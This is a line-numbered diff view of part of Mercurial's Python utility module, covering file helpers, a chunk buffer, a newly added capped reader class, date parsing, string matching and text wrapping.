1818 1818 self.discard()
1819 1819 else:
1820 1820 self.close()
1821 1821
1822 1822 def unlinkpath(f, ignoremissing=False):
1823 1823 """unlink and remove the directory if it is empty"""
1824 1824 if ignoremissing:
1825 1825 tryunlink(f)
1826 1826 else:
1827 1827 unlink(f)
1828 1828 # try removing directories that might now be empty
1829 1829 try:
1830 1830 removedirs(os.path.dirname(f))
1831 1831 except OSError:
1832 1832 pass
1833 1833
1834 1834 def tryunlink(f):
1835 1835 """Attempt to remove a file, ignoring ENOENT errors."""
1836 1836 try:
1837 1837 unlink(f)
1838 1838 except OSError as e:
1839 1839 if e.errno != errno.ENOENT:
1840 1840 raise
1841 1841
1842 1842 def makedirs(name, mode=None, notindexed=False):
1843 1843 """recursive directory creation with parent mode inheritance
1844 1844
1845 1845 Newly created directories are marked as "not to be indexed by
1846 1846 the content indexing service", if ``notindexed`` is specified
1847 1847 for "write" mode access.
1848 1848 """
1849 1849 try:
1850 1850 makedir(name, notindexed)
1851 1851 except OSError as err:
1852 1852 if err.errno == errno.EEXIST:
1853 1853 return
1854 1854 if err.errno != errno.ENOENT or not name:
1855 1855 raise
1856 1856 parent = os.path.dirname(os.path.abspath(name))
1857 1857 if parent == name:
1858 1858 raise
1859 1859 makedirs(parent, mode, notindexed)
1860 1860 try:
1861 1861 makedir(name, notindexed)
1862 1862 except OSError as err:
1863 1863 # Catch EEXIST to handle races
1864 1864 if err.errno == errno.EEXIST:
1865 1865 return
1866 1866 raise
1867 1867 if mode is not None:
1868 1868 os.chmod(name, mode)
1869 1869
1870 1870 def readfile(path):
1871 1871 with open(path, 'rb') as fp:
1872 1872 return fp.read()
1873 1873
1874 1874 def writefile(path, text):
1875 1875 with open(path, 'wb') as fp:
1876 1876 fp.write(text)
1877 1877
1878 1878 def appendfile(path, text):
1879 1879 with open(path, 'ab') as fp:
1880 1880 fp.write(text)
1881 1881
1882 1882 class chunkbuffer(object):
1883 1883 """Allow arbitrary sized chunks of data to be efficiently read from an
1884 1884 iterator over chunks of arbitrary size."""
1885 1885
1886 1886 def __init__(self, in_iter):
1887 1887 """in_iter is the iterator that's iterating over the input chunks."""
1888 1888 def splitbig(chunks):
1889 1889 for chunk in chunks:
1890 1890 if len(chunk) > 2**20:
1891 1891 pos = 0
1892 1892 while pos < len(chunk):
1893 1893 end = pos + 2 ** 18
1894 1894 yield chunk[pos:end]
1895 1895 pos = end
1896 1896 else:
1897 1897 yield chunk
1898 1898 self.iter = splitbig(in_iter)
1899 1899 self._queue = collections.deque()
1900 1900 self._chunkoffset = 0
1901 1901
1902 1902 def read(self, l=None):
1903 1903 """Read L bytes of data from the iterator of chunks of data.
1904 1904 Returns less than L bytes if the iterator runs dry.
1905 1905
1906 1906 If size parameter is omitted, read everything"""
1907 1907 if l is None:
1908 1908 return ''.join(self.iter)
1909 1909
1910 1910 left = l
1911 1911 buf = []
1912 1912 queue = self._queue
1913 1913 while left > 0:
1914 1914 # refill the queue
1915 1915 if not queue:
1916 1916 target = 2**18
1917 1917 for chunk in self.iter:
1918 1918 queue.append(chunk)
1919 1919 target -= len(chunk)
1920 1920 if target <= 0:
1921 1921 break
1922 1922 if not queue:
1923 1923 break
1924 1924
1925 1925 # The easy way to do this would be to queue.popleft(), modify the
1926 1926 # chunk (if necessary), then queue.appendleft(). However, for cases
1927 1927 # where we read partial chunk content, this incurs 2 dequeue
1928 1928 # mutations and creates a new str for the remaining chunk in the
1929 1929 # queue. Our code below avoids this overhead.
1930 1930
1931 1931 chunk = queue[0]
1932 1932 chunkl = len(chunk)
1933 1933 offset = self._chunkoffset
1934 1934
1935 1935 # Use full chunk.
1936 1936 if offset == 0 and left >= chunkl:
1937 1937 left -= chunkl
1938 1938 queue.popleft()
1939 1939 buf.append(chunk)
1940 1940 # self._chunkoffset remains at 0.
1941 1941 continue
1942 1942
1943 1943 chunkremaining = chunkl - offset
1944 1944
1945 1945 # Use all of unconsumed part of chunk.
1946 1946 if left >= chunkremaining:
1947 1947 left -= chunkremaining
1948 1948 queue.popleft()
1949 1949 # offset == 0 is enabled by block above, so this won't merely
1950 1950 # copy via ``chunk[0:]``.
1951 1951 buf.append(chunk[offset:])
1952 1952 self._chunkoffset = 0
1953 1953
1954 1954 # Partial chunk needed.
1955 1955 else:
1956 1956 buf.append(chunk[offset:offset + left])
1957 1957 self._chunkoffset += left
1958 1958 left -= chunkremaining
1959 1959
1960 1960 return ''.join(buf)
1961 1961
1962 1962 def filechunkiter(f, size=131072, limit=None):
1963 1963 """Create a generator that produces the data in the file size
1964 1964 (default 131072) bytes at a time, up to optional limit (default is
1965 1965 to read all data). Chunks may be less than size bytes if the
1966 1966 chunk is the last chunk in the file, or the file is a socket or
1967 1967 some other type of file that sometimes reads less data than is
1968 1968 requested."""
1969 1969 assert size >= 0
1970 1970 assert limit is None or limit >= 0
1971 1971 while True:
1972 1972 if limit is None:
1973 1973 nbytes = size
1974 1974 else:
1975 1975 nbytes = min(limit, size)
1976 1976 s = nbytes and f.read(nbytes)
1977 1977 if not s:
1978 1978 break
1979 1979 if limit:
1980 1980 limit -= len(s)
1981 1981 yield s
1982 1982
1983 class cappedreader(object):
1984 """A file object proxy that allows reading up to N bytes.
1985
1986 Given a source file object, instances of this type allow reading up to
1987 N bytes from that source file object. Attempts to read past the allowed
1988 limit are treated as EOF.
1989
1990 It is assumed that I/O is not performed on the original file object
1991 in addition to I/O that is performed by this instance. If there is,
1992 state tracking will get out of sync and unexpected results will ensue.
1993 """
1994 def __init__(self, fh, limit):
1995 """Allow reading up to <limit> bytes from <fh>."""
1996 self._fh = fh
1997 self._left = limit
1998
1999 def read(self, n=-1):
2000 if not self._left:
2001 return b''
2002
2003 if n < 0:
2004 n = self._left
2005
2006 data = self._fh.read(min(n, self._left))
2007 self._left -= len(data)
2008 assert self._left >= 0
2009
2010 return data
2011
1983 2012 def makedate(timestamp=None):
1984 2013 '''Return a unix timestamp (or the current time) as a (unixtime,
1985 2014 offset) tuple based off the local timezone.'''
1986 2015 if timestamp is None:
1987 2016 timestamp = time.time()
1988 2017 if timestamp < 0:
1989 2018 hint = _("check your clock")
1990 2019 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1991 2020 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1992 2021 datetime.datetime.fromtimestamp(timestamp))
1993 2022 tz = delta.days * 86400 + delta.seconds
1994 2023 return timestamp, tz
1995 2024
1996 2025 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1997 2026 """represent a (unixtime, offset) tuple as a localized time.
1998 2027 unixtime is seconds since the epoch, and offset is the time zone's
1999 2028 number of seconds away from UTC.
2000 2029
2001 2030 >>> datestr((0, 0))
2002 2031 'Thu Jan 01 00:00:00 1970 +0000'
2003 2032 >>> datestr((42, 0))
2004 2033 'Thu Jan 01 00:00:42 1970 +0000'
2005 2034 >>> datestr((-42, 0))
2006 2035 'Wed Dec 31 23:59:18 1969 +0000'
2007 2036 >>> datestr((0x7fffffff, 0))
2008 2037 'Tue Jan 19 03:14:07 2038 +0000'
2009 2038 >>> datestr((-0x80000000, 0))
2010 2039 'Fri Dec 13 20:45:52 1901 +0000'
2011 2040 """
2012 2041 t, tz = date or makedate()
2013 2042 if "%1" in format or "%2" in format or "%z" in format:
2014 2043 sign = (tz > 0) and "-" or "+"
2015 2044 minutes = abs(tz) // 60
2016 2045 q, r = divmod(minutes, 60)
2017 2046 format = format.replace("%z", "%1%2")
2018 2047 format = format.replace("%1", "%c%02d" % (sign, q))
2019 2048 format = format.replace("%2", "%02d" % r)
2020 2049 d = t - tz
2021 2050 if d > 0x7fffffff:
2022 2051 d = 0x7fffffff
2023 2052 elif d < -0x80000000:
2024 2053 d = -0x80000000
2025 2054 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2026 2055 # because they use the gmtime() system call which is buggy on Windows
2027 2056 # for negative values.
2028 2057 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2029 2058 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2030 2059 return s
2031 2060
2032 2061 def shortdate(date=None):
2033 2062 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2034 2063 return datestr(date, format='%Y-%m-%d')
2035 2064
2036 2065 def parsetimezone(s):
2037 2066 """find a trailing timezone, if any, in string, and return a
2038 2067 (offset, remainder) pair"""
2039 2068
2040 2069 if s.endswith("GMT") or s.endswith("UTC"):
2041 2070 return 0, s[:-3].rstrip()
2042 2071
2043 2072 # Unix-style timezones [+-]hhmm
2044 2073 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2045 2074 sign = (s[-5] == "+") and 1 or -1
2046 2075 hours = int(s[-4:-2])
2047 2076 minutes = int(s[-2:])
2048 2077 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2049 2078
2050 2079 # ISO8601 trailing Z
2051 2080 if s.endswith("Z") and s[-2:-1].isdigit():
2052 2081 return 0, s[:-1]
2053 2082
2054 2083 # ISO8601-style [+-]hh:mm
2055 2084 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2056 2085 s[-5:-3].isdigit() and s[-2:].isdigit()):
2057 2086 sign = (s[-6] == "+") and 1 or -1
2058 2087 hours = int(s[-5:-3])
2059 2088 minutes = int(s[-2:])
2060 2089 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2061 2090
2062 2091 return None, s
2063 2092
2064 2093 def strdate(string, format, defaults=None):
2065 2094 """parse a localized time string and return a (unixtime, offset) tuple.
2066 2095 if the string cannot be parsed, ValueError is raised."""
2067 2096 if defaults is None:
2068 2097 defaults = {}
2069 2098
2070 2099 # NOTE: unixtime = localunixtime + offset
2071 2100 offset, date = parsetimezone(string)
2072 2101
2073 2102 # add missing elements from defaults
2074 2103 usenow = False # default to using biased defaults
2075 2104 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2076 2105 part = pycompat.bytestr(part)
2077 2106 found = [True for p in part if ("%"+p) in format]
2078 2107 if not found:
2079 2108 date += "@" + defaults[part][usenow]
2080 2109 format += "@%" + part[0]
2081 2110 else:
2082 2111 # We've found a specific time element, less specific time
2083 2112 # elements are relative to today
2084 2113 usenow = True
2085 2114
2086 2115 timetuple = time.strptime(encoding.strfromlocal(date),
2087 2116 encoding.strfromlocal(format))
2088 2117 localunixtime = int(calendar.timegm(timetuple))
2089 2118 if offset is None:
2090 2119 # local timezone
2091 2120 unixtime = int(time.mktime(timetuple))
2092 2121 offset = unixtime - localunixtime
2093 2122 else:
2094 2123 unixtime = localunixtime + offset
2095 2124 return unixtime, offset
2096 2125
2097 2126 def parsedate(date, formats=None, bias=None):
2098 2127 """parse a localized date/time and return a (unixtime, offset) tuple.
2099 2128
2100 2129 The date may be a "unixtime offset" string or in one of the specified
2101 2130 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2102 2131
2103 2132 >>> parsedate(b' today ') == parsedate(
2104 2133 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2105 2134 True
2106 2135 >>> parsedate(b'yesterday ') == parsedate(
2107 2136 ... (datetime.date.today() - datetime.timedelta(days=1)
2108 2137 ... ).strftime('%b %d').encode('ascii'))
2109 2138 True
2110 2139 >>> now, tz = makedate()
2111 2140 >>> strnow, strtz = parsedate(b'now')
2112 2141 >>> (strnow - now) < 1
2113 2142 True
2114 2143 >>> tz == strtz
2115 2144 True
2116 2145 """
2117 2146 if bias is None:
2118 2147 bias = {}
2119 2148 if not date:
2120 2149 return 0, 0
2121 2150 if isinstance(date, tuple) and len(date) == 2:
2122 2151 return date
2123 2152 if not formats:
2124 2153 formats = defaultdateformats
2125 2154 date = date.strip()
2126 2155
2127 2156 if date == 'now' or date == _('now'):
2128 2157 return makedate()
2129 2158 if date == 'today' or date == _('today'):
2130 2159 date = datetime.date.today().strftime(r'%b %d')
2131 2160 date = encoding.strtolocal(date)
2132 2161 elif date == 'yesterday' or date == _('yesterday'):
2133 2162 date = (datetime.date.today() -
2134 2163 datetime.timedelta(days=1)).strftime(r'%b %d')
2135 2164 date = encoding.strtolocal(date)
2136 2165
2137 2166 try:
2138 2167 when, offset = map(int, date.split(' '))
2139 2168 except ValueError:
2140 2169 # fill out defaults
2141 2170 now = makedate()
2142 2171 defaults = {}
2143 2172 for part in ("d", "mb", "yY", "HI", "M", "S"):
2144 2173 # this piece is for rounding the specific end of unknowns
2145 2174 b = bias.get(part)
2146 2175 if b is None:
2147 2176 if part[0:1] in "HMS":
2148 2177 b = "00"
2149 2178 else:
2150 2179 b = "0"
2151 2180
2152 2181 # this piece is for matching the generic end to today's date
2153 2182 n = datestr(now, "%" + part[0:1])
2154 2183
2155 2184 defaults[part] = (b, n)
2156 2185
2157 2186 for format in formats:
2158 2187 try:
2159 2188 when, offset = strdate(date, format, defaults)
2160 2189 except (ValueError, OverflowError):
2161 2190 pass
2162 2191 else:
2163 2192 break
2164 2193 else:
2165 2194 raise error.ParseError(_('invalid date: %r') % date)
2166 2195 # validate explicit (probably user-specified) date and
2167 2196 # time zone offset. values must fit in signed 32 bits for
2168 2197 # current 32-bit linux runtimes. timezones go from UTC-12
2169 2198 # to UTC+14
2170 2199 if when < -0x80000000 or when > 0x7fffffff:
2171 2200 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2172 2201 if offset < -50400 or offset > 43200:
2173 2202 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2174 2203 return when, offset
2175 2204
2176 2205 def matchdate(date):
2177 2206 """Return a function that matches a given date match specifier
2178 2207
2179 2208 Formats include:
2180 2209
2181 2210 '{date}' match a given date to the accuracy provided
2182 2211
2183 2212 '<{date}' on or before a given date
2184 2213
2185 2214 '>{date}' on or after a given date
2186 2215
2187 2216 >>> p1 = parsedate(b"10:29:59")
2188 2217 >>> p2 = parsedate(b"10:30:00")
2189 2218 >>> p3 = parsedate(b"10:30:59")
2190 2219 >>> p4 = parsedate(b"10:31:00")
2191 2220 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2192 2221 >>> f = matchdate(b"10:30")
2193 2222 >>> f(p1[0])
2194 2223 False
2195 2224 >>> f(p2[0])
2196 2225 True
2197 2226 >>> f(p3[0])
2198 2227 True
2199 2228 >>> f(p4[0])
2200 2229 False
2201 2230 >>> f(p5[0])
2202 2231 False
2203 2232 """
2204 2233
2205 2234 def lower(date):
2206 2235 d = {'mb': "1", 'd': "1"}
2207 2236 return parsedate(date, extendeddateformats, d)[0]
2208 2237
2209 2238 def upper(date):
2210 2239 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2211 2240 for days in ("31", "30", "29"):
2212 2241 try:
2213 2242 d["d"] = days
2214 2243 return parsedate(date, extendeddateformats, d)[0]
2215 2244 except error.ParseError:
2216 2245 pass
2217 2246 d["d"] = "28"
2218 2247 return parsedate(date, extendeddateformats, d)[0]
2219 2248
2220 2249 date = date.strip()
2221 2250
2222 2251 if not date:
2223 2252 raise Abort(_("dates cannot consist entirely of whitespace"))
2224 2253 elif date[0] == "<":
2225 2254 if not date[1:]:
2226 2255 raise Abort(_("invalid day spec, use '<DATE'"))
2227 2256 when = upper(date[1:])
2228 2257 return lambda x: x <= when
2229 2258 elif date[0] == ">":
2230 2259 if not date[1:]:
2231 2260 raise Abort(_("invalid day spec, use '>DATE'"))
2232 2261 when = lower(date[1:])
2233 2262 return lambda x: x >= when
2234 2263 elif date[0] == "-":
2235 2264 try:
2236 2265 days = int(date[1:])
2237 2266 except ValueError:
2238 2267 raise Abort(_("invalid day spec: %s") % date[1:])
2239 2268 if days < 0:
2240 2269 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2241 2270 % date[1:])
2242 2271 when = makedate()[0] - days * 3600 * 24
2243 2272 return lambda x: x >= when
2244 2273 elif " to " in date:
2245 2274 a, b = date.split(" to ")
2246 2275 start, stop = lower(a), upper(b)
2247 2276 return lambda x: x >= start and x <= stop
2248 2277 else:
2249 2278 start, stop = lower(date), upper(date)
2250 2279 return lambda x: x >= start and x <= stop
2251 2280
2252 2281 def stringmatcher(pattern, casesensitive=True):
2253 2282 """
2254 2283 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2255 2284 returns the matcher name, pattern, and matcher function.
2256 2285 missing or unknown prefixes are treated as literal matches.
2257 2286
2258 2287 helper for tests:
2259 2288 >>> def test(pattern, *tests):
2260 2289 ... kind, pattern, matcher = stringmatcher(pattern)
2261 2290 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2262 2291 >>> def itest(pattern, *tests):
2263 2292 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2264 2293 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2265 2294
2266 2295 exact matching (no prefix):
2267 2296 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2268 2297 ('literal', 'abcdefg', [False, False, True])
2269 2298
2270 2299 regex matching ('re:' prefix)
2271 2300 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2272 2301 ('re', 'a.+b', [False, False, True])
2273 2302
2274 2303 force exact matches ('literal:' prefix)
2275 2304 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2276 2305 ('literal', 're:foobar', [False, True])
2277 2306
2278 2307 unknown prefixes are ignored and treated as literals
2279 2308 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2280 2309 ('literal', 'foo:bar', [False, False, True])
2281 2310
2282 2311 case insensitive regex matches
2283 2312 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2284 2313 ('re', 'A.+b', [False, False, True])
2285 2314
2286 2315 case insensitive literal matches
2287 2316 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2288 2317 ('literal', 'ABCDEFG', [False, False, True])
2289 2318 """
2290 2319 if pattern.startswith('re:'):
2291 2320 pattern = pattern[3:]
2292 2321 try:
2293 2322 flags = 0
2294 2323 if not casesensitive:
2295 2324 flags = remod.I
2296 2325 regex = remod.compile(pattern, flags)
2297 2326 except remod.error as e:
2298 2327 raise error.ParseError(_('invalid regular expression: %s')
2299 2328 % e)
2300 2329 return 're', pattern, regex.search
2301 2330 elif pattern.startswith('literal:'):
2302 2331 pattern = pattern[8:]
2303 2332
2304 2333 match = pattern.__eq__
2305 2334
2306 2335 if not casesensitive:
2307 2336 ipat = encoding.lower(pattern)
2308 2337 match = lambda s: ipat == encoding.lower(s)
2309 2338 return 'literal', pattern, match
2310 2339
2311 2340 def shortuser(user):
2312 2341 """Return a short representation of a user name or email address."""
2313 2342 f = user.find('@')
2314 2343 if f >= 0:
2315 2344 user = user[:f]
2316 2345 f = user.find('<')
2317 2346 if f >= 0:
2318 2347 user = user[f + 1:]
2319 2348 f = user.find(' ')
2320 2349 if f >= 0:
2321 2350 user = user[:f]
2322 2351 f = user.find('.')
2323 2352 if f >= 0:
2324 2353 user = user[:f]
2325 2354 return user
2326 2355
2327 2356 def emailuser(user):
2328 2357 """Return the user portion of an email address."""
2329 2358 f = user.find('@')
2330 2359 if f >= 0:
2331 2360 user = user[:f]
2332 2361 f = user.find('<')
2333 2362 if f >= 0:
2334 2363 user = user[f + 1:]
2335 2364 return user
2336 2365
2337 2366 def email(author):
2338 2367 '''get email of author.'''
2339 2368 r = author.find('>')
2340 2369 if r == -1:
2341 2370 r = None
2342 2371 return author[author.find('<') + 1:r]
2343 2372
2344 2373 def ellipsis(text, maxlength=400):
2345 2374 """Trim string to at most maxlength (default: 400) columns in display."""
2346 2375 return encoding.trim(text, maxlength, ellipsis='...')
2347 2376
2348 2377 def unitcountfn(*unittable):
2349 2378 '''return a function that renders a readable count of some quantity'''
2350 2379
2351 2380 def go(count):
2352 2381 for multiplier, divisor, format in unittable:
2353 2382 if abs(count) >= divisor * multiplier:
2354 2383 return format % (count / float(divisor))
2355 2384 return unittable[-1][2] % count
2356 2385
2357 2386 return go
2358 2387
2359 2388 def processlinerange(fromline, toline):
2360 2389 """Check that linerange <fromline>:<toline> makes sense and return a
2361 2390 0-based range.
2362 2391
2363 2392 >>> processlinerange(10, 20)
2364 2393 (9, 20)
2365 2394 >>> processlinerange(2, 1)
2366 2395 Traceback (most recent call last):
2367 2396 ...
2368 2397 ParseError: line range must be positive
2369 2398 >>> processlinerange(0, 5)
2370 2399 Traceback (most recent call last):
2371 2400 ...
2372 2401 ParseError: fromline must be strictly positive
2373 2402 """
2374 2403 if toline - fromline < 0:
2375 2404 raise error.ParseError(_("line range must be positive"))
2376 2405 if fromline < 1:
2377 2406 raise error.ParseError(_("fromline must be strictly positive"))
2378 2407 return fromline - 1, toline
2379 2408
2380 2409 bytecount = unitcountfn(
2381 2410 (100, 1 << 30, _('%.0f GB')),
2382 2411 (10, 1 << 30, _('%.1f GB')),
2383 2412 (1, 1 << 30, _('%.2f GB')),
2384 2413 (100, 1 << 20, _('%.0f MB')),
2385 2414 (10, 1 << 20, _('%.1f MB')),
2386 2415 (1, 1 << 20, _('%.2f MB')),
2387 2416 (100, 1 << 10, _('%.0f KB')),
2388 2417 (10, 1 << 10, _('%.1f KB')),
2389 2418 (1, 1 << 10, _('%.2f KB')),
2390 2419 (1, 1, _('%.0f bytes')),
2391 2420 )
2392 2421
2393 2422 # Matches a single EOL which can either be a CRLF where repeated CR
2394 2423 # are removed or a LF. We do not care about old Macintosh files, so a
2395 2424 # stray CR is an error.
2396 2425 _eolre = remod.compile(br'\r*\n')
2397 2426
2398 2427 def tolf(s):
2399 2428 return _eolre.sub('\n', s)
2400 2429
2401 2430 def tocrlf(s):
2402 2431 return _eolre.sub('\r\n', s)
2403 2432
2404 2433 if pycompat.oslinesep == '\r\n':
2405 2434 tonativeeol = tocrlf
2406 2435 fromnativeeol = tolf
2407 2436 else:
2408 2437 tonativeeol = pycompat.identity
2409 2438 fromnativeeol = pycompat.identity
2410 2439
2411 2440 def escapestr(s):
2412 2441 # call underlying function of s.encode('string_escape') directly for
2413 2442 # Python 3 compatibility
2414 2443 return codecs.escape_encode(s)[0]
2415 2444
2416 2445 def unescapestr(s):
2417 2446 return codecs.escape_decode(s)[0]
2418 2447
2419 2448 def forcebytestr(obj):
2420 2449 """Portably format an arbitrary object (e.g. exception) into a byte
2421 2450 string."""
2422 2451 try:
2423 2452 return pycompat.bytestr(obj)
2424 2453 except UnicodeEncodeError:
2425 2454 # non-ascii string, may be lossy
2426 2455 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2427 2456
2428 2457 def uirepr(s):
2429 2458 # Avoid double backslash in Windows path repr()
2430 2459 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2431 2460
2432 2461 # delay import of textwrap
2433 2462 def MBTextWrapper(**kwargs):
2434 2463 class tw(textwrap.TextWrapper):
2435 2464 """
2436 2465 Extend TextWrapper for width-awareness.
2437 2466
2438 2467 Neither number of 'bytes' in any encoding nor 'characters' is
2439 2468 appropriate to calculate terminal columns for specified string.
2440 2469
2441 2470 Original TextWrapper implementation uses built-in 'len()' directly,
2442 2471 so overriding is needed to use width information of each characters.
2443 2472
2444 2473 In addition, characters classified into 'ambiguous' width are
2445 2474 treated as wide in East Asian area, but as narrow in other.
2446 2475
2447 2476 This requires use decision to determine width of such characters.
2448 2477 """
2449 2478 def _cutdown(self, ucstr, space_left):
2450 2479 l = 0
2451 2480 colwidth = encoding.ucolwidth
2452 2481 for i in xrange(len(ucstr)):
2453 2482 l += colwidth(ucstr[i])
2454 2483 if space_left < l:
2455 2484 return (ucstr[:i], ucstr[i:])
2456 2485 return ucstr, ''
2457 2486
2458 2487 # overriding of base class
2459 2488 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2460 2489 space_left = max(width - cur_len, 1)
2461 2490
2462 2491 if self.break_long_words:
2463 2492 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2464 2493 cur_line.append(cut)
2465 2494 reversed_chunks[-1] = res
2466 2495 elif not cur_line:
2467 2496 cur_line.append(reversed_chunks.pop())
2468 2497
2469 2498 # this overriding code is imported from TextWrapper of Python 2.6
2470 2499 # to calculate columns of string by 'encoding.ucolwidth()'
2471 2500 def _wrap_chunks(self, chunks):
2472 2501 colwidth = encoding.ucolwidth
2473 2502
2474 2503 lines = []
2475 2504 if self.width <= 0:
2476 2505 raise ValueError("invalid width %r (must be > 0)" % self.width)
2477 2506
2478 2507 # Arrange in reverse order so items can be efficiently popped
2479 2508 # from a stack of chucks.
2480 2509 chunks.reverse()
2481 2510
2482 2511 while chunks:
2483 2512
2484 2513 # Start the list of chunks that will make up the current line.
2485 2514 # cur_len is just the length of all the chunks in cur_line.
2486 2515 cur_line = []
2487 2516 cur_len = 0
2488 2517
2489 2518 # Figure out which static string will prefix this line.
2490 2519 if lines:
2491 2520 indent = self.subsequent_indent
2492 2521 else:
2493 2522 indent = self.initial_indent
2494 2523
2495 2524 # Maximum width for this line.
2496 2525 width = self.width - len(indent)
2497 2526
2498 2527 # First chunk on line is whitespace -- drop it, unless this
2499 2528 # is the very beginning of the text (i.e. no lines started yet).
2500 2529 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2501 2530 del chunks[-1]
2502 2531
2503 2532 while chunks:
2504 2533 l = colwidth(chunks[-1])
2505 2534
2506 2535 # Can at least squeeze this chunk onto the current line.
2507 2536 if cur_len + l <= width:
2508 2537 cur_line.append(chunks.pop())
2509 2538 cur_len += l
2510 2539
2511 2540 # Nope, this line is full.
2512 2541 else:
2513 2542 break
2514 2543
2515 2544 # The current line is full, and the next chunk is too big to
2516 2545 # fit on *any* line (not just this one).
2517 2546 if chunks and colwidth(chunks[-1]) > width:
2518 2547 self._handle_long_word(chunks, cur_line, cur_len, width)
2519 2548
2520 2549 # If the last chunk on this line is all whitespace, drop it.
2521 2550 if (self.drop_whitespace and
2522 2551 cur_line and cur_line[-1].strip() == r''):
2523 2552 del cur_line[-1]
2524 2553
2525 2554 # Convert current line back to a string and store it in list
2526 2555 # of all lines (return value).
2527 2556 if cur_line:
2528 2557 lines.append(indent + r''.join(cur_line))
2529 2558
2530 2559 return lines
2531 2560
2532 2561 global MBTextWrapper
2533 2562 MBTextWrapper = tw
2534 2563 return tw(**kwargs)
2535 2564
2536 2565 def wrap(line, width, initindent='', hangindent=''):
2537 2566 maxindent = max(len(hangindent), len(initindent))
2538 2567 if width <= maxindent:
2539 2568 # adjust for weird terminal size
2540 2569 width = max(78, maxindent + 1)
2541 2570 line = line.decode(pycompat.sysstr(encoding.encoding),
2542 2571 pycompat.sysstr(encoding.encodingmode))
2543 2572 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2544 2573 pycompat.sysstr(encoding.encodingmode))
2545 2574 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2546 2575 pycompat.sysstr(encoding.encodingmode))
2547 2576 wrapper = MBTextWrapper(width=width,
2548 2577 initial_indent=initindent,
2549 2578 subsequent_indent=hangindent)
2550 2579 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2551 2580
2552 2581 if (pyplatform.python_implementation() == 'CPython' and
2553 2582 sys.version_info < (3, 0)):
2554 2583 # There is an issue in CPython that some IO methods do not handle EINTR
2555 2584 # correctly. The following table shows what CPython version (and functions)
2556 2585 # are affected (buggy: has the EINTR bug, okay: otherwise):
2557 2586 #
2558 2587 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2559 2588 # --------------------------------------------------
2560 2589 # fp.__iter__ | buggy | buggy | okay
2561 2590 # fp.read* | buggy | okay [1] | okay
2562 2591 #
2563 2592 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2564 2593 #
2565 2594 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2566 2595 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2567 2596 #
2568 2597 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2569 2598 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2570 2599 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2571 2600 # fp.__iter__ but not other fp.read* methods.
2572 2601 #
2573 2602 # On modern systems like Linux, the "read" syscall cannot be interrupted
2574 2603 # when reading "fast" files like on-disk files. So the EINTR issue only
2575 2604 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2576 2605 # files approximately as "fast" files and use the fast (unsafe) code path,
2577 2606 # to minimize the performance impact.
2578 2607 if sys.version_info >= (2, 7, 4):
2579 2608 # fp.readline deals with EINTR correctly, use it as a workaround.
2580 2609 def _safeiterfile(fp):
2581 2610 return iter(fp.readline, '')
2582 2611 else:
2583 2612 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2584 2613 # note: this may block longer than necessary because of bufsize.
2585 2614 def _safeiterfile(fp, bufsize=4096):
2586 2615 fd = fp.fileno()
2587 2616 line = ''
2588 2617 while True:
2589 2618 try:
2590 2619 buf = os.read(fd, bufsize)
2591 2620 except OSError as ex:
2592 2621 # os.read only raises EINTR before any data is read
2593 2622 if ex.errno == errno.EINTR:
2594 2623 continue
2595 2624 else:
2596 2625 raise
2597 2626 line += buf
2598 2627 if '\n' in buf:
2599 2628 splitted = line.splitlines(True)
2600 2629 line = ''
2601 2630 for l in splitted:
2602 2631 if l[-1] == '\n':
2603 2632 yield l
2604 2633 else:
2605 2634 line = l
2606 2635 if not buf:
2607 2636 break
2608 2637 if line:
2609 2638 yield line
2610 2639
2611 2640 def iterfile(fp):
2612 2641 fastpath = True
2613 2642 if type(fp) is file:
2614 2643 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2615 2644 if fastpath:
2616 2645 return fp
2617 2646 else:
2618 2647 return _safeiterfile(fp)
2619 2648 else:
2620 2649 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2621 2650 def iterfile(fp):
2622 2651 return fp
